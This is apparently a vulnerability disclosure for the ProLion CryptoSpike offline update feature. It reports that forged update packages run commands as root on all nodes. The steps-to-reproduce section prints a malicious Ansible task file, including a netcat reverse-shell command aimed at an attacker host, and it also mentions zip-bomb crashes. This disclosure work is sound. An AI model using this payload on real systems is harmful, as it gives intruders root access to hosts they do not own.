A missing integrity check in the update system in ProLion CryptoSpike3.0.15P2 allows attackers to execute OS commands as the root Linux user on the host system via forged update packages

Introduction

The CryptoSpike system provides an update function that can work both in online mode when the server has Internet access, and in offline mode. In the latter case, the software update is performed by uploading in CryptoSpike the update packages released by the vendor in the form of archive files. The operation can be performed through a special section on the management interface or, in alternative, though REST APIs.

It has been verified that the update system in offline mode is unsecure because no authenticity and integrity checks are performed on the update packages released by the vendor, hence a malicious actor can forge the packages before they are loaded on the system. Consequently, it is possible to specify a series of operating system commands inside the update files, that will be executed on all the nodes of the system (leader and agents) with root privileges.

Steps to reproduce

Connect to the Cryptospike web management interface (on the Leader node) with an identity having a role including the “Update” permission set to MODIFY, access the “System”, “Update” section where it is possible to upload updates in .tgz format.

The malicious actor modifies an existing update package or prepares one similar to the one expected from the product (i.e., an Ansible descriptor in YAML format, with setup.yml name inside a directory named “bundle”) containing two malicious commands, the first one will write a file inside the /tmp/ directory on the filesystem and the second one will open a reverse shell towards an attacker machine:

—

• name: Hacked script hosts: all become: yes vars:

  product information

  product_name: “Product” product_version: “V0.0.0”

  base directory where the bundle files are located

  target_dir: “/prolion/packages” log_dir: “/prolion/logs” log_file_name: “update_os.log”

  tasks:

  • name: “create a file” shell: “echo HACKED > /tmp/HACKED.txt”

  • name: “execute reverse shell” shell: “nc [REDACTED IP].230 1234 -e /bin/sh”

On the attacker machine a netcat has been launched in advance in listening mode on the same port specified in the commands inside the update bundle file as in the source above:

After some moments, the Ansible tasks are correctly executed by the update subsystem with root privileges, as shown in the picture below, where the obtained reverse shell allows to verify the root privileges of the running user on the host server (the leader host node, not the container node) and a file owned by root has been written inside /tmp/ directory on the filesystem.

It has also been verified that the Ansible tasks can be run on all the infrastructure nodes (Leader and Agent nodes) and without prior checks on the .tgz archive contents, thus allowing “zip bomb” attacks that would cause a complete crash of the system.